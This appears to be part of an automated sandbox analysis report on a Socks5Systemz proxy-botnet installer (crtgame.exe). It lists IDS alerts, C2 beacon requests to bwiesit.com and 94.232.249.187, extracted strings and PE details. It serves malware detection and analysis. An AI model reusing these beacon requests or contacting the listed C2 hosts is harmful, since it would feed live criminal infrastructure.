Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49870 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49740 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49740 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49852 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49737 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49899 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49737 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49847 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49828 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49847 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49777 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49883 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49913 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49913 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49790 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49828 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49893 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49893 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49844 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49870 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49899 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49825 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49825 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49861 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49861 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49876 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49792 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49876 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49834 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49834 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49844 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49792 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49865 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49865 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49887 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49887 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49905 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49905 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49909 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49909 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49839 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49839 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49895 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49895 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49923 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49923 -> 94.232.249.187:80
                  Source: Malware configuration extractor | URLs: bwiesit.com
                  Source: global traffic | TCP traffic: 192.168.2.4:49915 -> 46.8.225.74:2023
                  Source: Joe Sandbox View | ASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
                  Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1 | Host: bwiesit.com | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945cea4de0a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cadb5cbb22 HTTP/1.1 | Host: bwiesit.com | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknown | UDP traffic detected without corresponding DNS query: 45.155.250.90
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C22B95 WSASetLastError,WSARecv,WSASetLastError,select,6_2_02C22B95
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945cea4de0a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cadb5cbb22 HTTP/1.1 | Host: bwiesit.com | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic | DNS traffic detected: DNS query: bwiesit.com
Source: crtgame.exe, 00000006.00000002.2940328851.00000000036D2000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.000000000089F000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.0000000000867000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.00000000008C1000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.0000000000840000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde2
Source: crtgame.exe, 00000006.00000002.2938924611.00000000008C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde2
Source: is-RNIE1.tmp.1.dr | String found in binary or memory: http://LosslessAudio.org/0
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
Source: is-BJBAO.tmp.1.dr | String found in binary or memory: http://code.google.com/p/mp4v2D
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: is-HAM7K.tmp.1.dr | String found in binary or memory: http://lame.sf.net
Source: is-HAM7K.tmp.1.dr | String found in binary or memory: http://lame.sf.net32bits
Source: is-2CGLR.tmp.1.dr | String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: is-58TJN.tmp.1.dr, is-HS78I.tmp.1.dr, is-V8IE4.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0O
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://ocsps.ssl.com0
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://ocsps.ssl.com0Q
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: 6hvZpn91O8.tmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.dr | String found in binary or memory: http://www.innosetup.com/
Source: is-HAM7K.tmp.1.dr | String found in binary or memory: http://www.mp3dev.org/
Source: is-HAM7K.tmp.1.dr | String found in binary or memory: http://www.mp3dev.org/ID3Error
Source: is-QECHS.tmp.1.dr | String found in binary or memory: http://www.mpg123.de
Source: 6hvZpn91O8.exe, 00000000.00000003.1677333051.0000000002148000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.exe, 00000000.00000003.1677127078.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.tmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/ps
Source: 6hvZpn91O8.exe, 00000000.00000003.1677333051.0000000002148000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.exe, 00000000.00000003.1677127078.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/psU
Source: is-G7PIK.tmp.1.dr | String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: is-73F5N.tmp.1.dr | String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: is-BJBAO.tmp.1.dr | String found in binary or memory: https://mp4v2.googlecode.com/svn
Source: is-BJBAO.tmp.1.dr | String found in binary or memory: https://mp4v2.googlecode.com/svn/trunk
Source: is-BJBAO.tmp.1.dr | String found in binary or memory: https://mp4v2.googlecode.com/svn/trunkrepository
Source: is-BJBAO.tmp.1.dr | String found in binary or memory: https://mp4v2.googlecode.com/svnrepository
Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.dr | String found in binary or memory: https://sectigo.com/CPS0
Source: is-S02KC.tmp.1.dr | String found in binary or memory: https://streams.videolan.org/upload/
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.dr | String found in binary or memory: https://www.ssl.com/repository0

                  System Summary

Source: is-HASL7.tmp.1.dr | Static PE information: section name:
Source: is-HASL7.tmp.1.dr | Static PE information: section name:
Source: is-5IVSF.tmp.1.dr | Static PE information: section name:
Source: is-5IVSF.tmp.1.dr | Static PE information: section name:
Source: is-IG6J1.tmp.1.dr | Static PE information: section name:
Source: is-IG6J1.tmp.1.dr | Static PE information: section name:
Source: is-640V1.tmp.1.dr | Static PE information: section name:
Source: is-FJ939.tmp.1.dr | Static PE information: section name:
Source: is-FJ939.tmp.1.dr | Static PE information: section name:
Source: is-KCF1P.tmp.1.dr | Static PE information: section name:
Source: is-KCF1P.tmp.1.dr | Static PE information: section name:
Source: is-HS78I.tmp.1.dr | Static PE information: section name:
Source: is-DQCHN.tmp.1.dr | Static PE information: section name:
Source: is-DQCHN.tmp.1.dr | Static PE information: section name:
Source: is-DQCHN.tmp.1.dr | Static PE information: section name:
Source: is-BDC3N.tmp.1.dr | Static PE information: section name:
Source: is-BDC3N.tmp.1.dr | Static PE information: section name:
Source: is-65BJ1.tmp.1.dr | Static PE information: section name:
Source: is-65BJ1.tmp.1.dr | Static PE information: section name:
Source: is-65BJ1.tmp.1.dr | Static PE information: section name:
Source: is-ONP9R.tmp.1.dr | Static PE information: section name:
Source: is-ONP9R.tmp.1.dr | Static PE information: section name:
Source: is-KANF7.tmp.1.dr | Static PE information: section name:
Source: is-KANF7.tmp.1.dr | Static PE information: section name:
Source: is-OMMAA.tmp.1.dr | Static PE information: section name:
Source: is-OMMAA.tmp.1.dr | Static PE information: section name:
Source: is-OMMAA.tmp.1.dr | Static PE information: section name:
Source: is-UT0J0.tmp.1.dr | Static PE information: section name:
Source: is-UT0J0.tmp.1.dr | Static PE information: section name:
Source: is-766CT.tmp.1.dr | Static PE information: section name:
Source: is-766CT.tmp.1.dr | Static PE information: section name:
Source: is-766CT.tmp.1.dr | Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0042F394 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00423B94 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004125E8 NtdllDefWindowProc_A
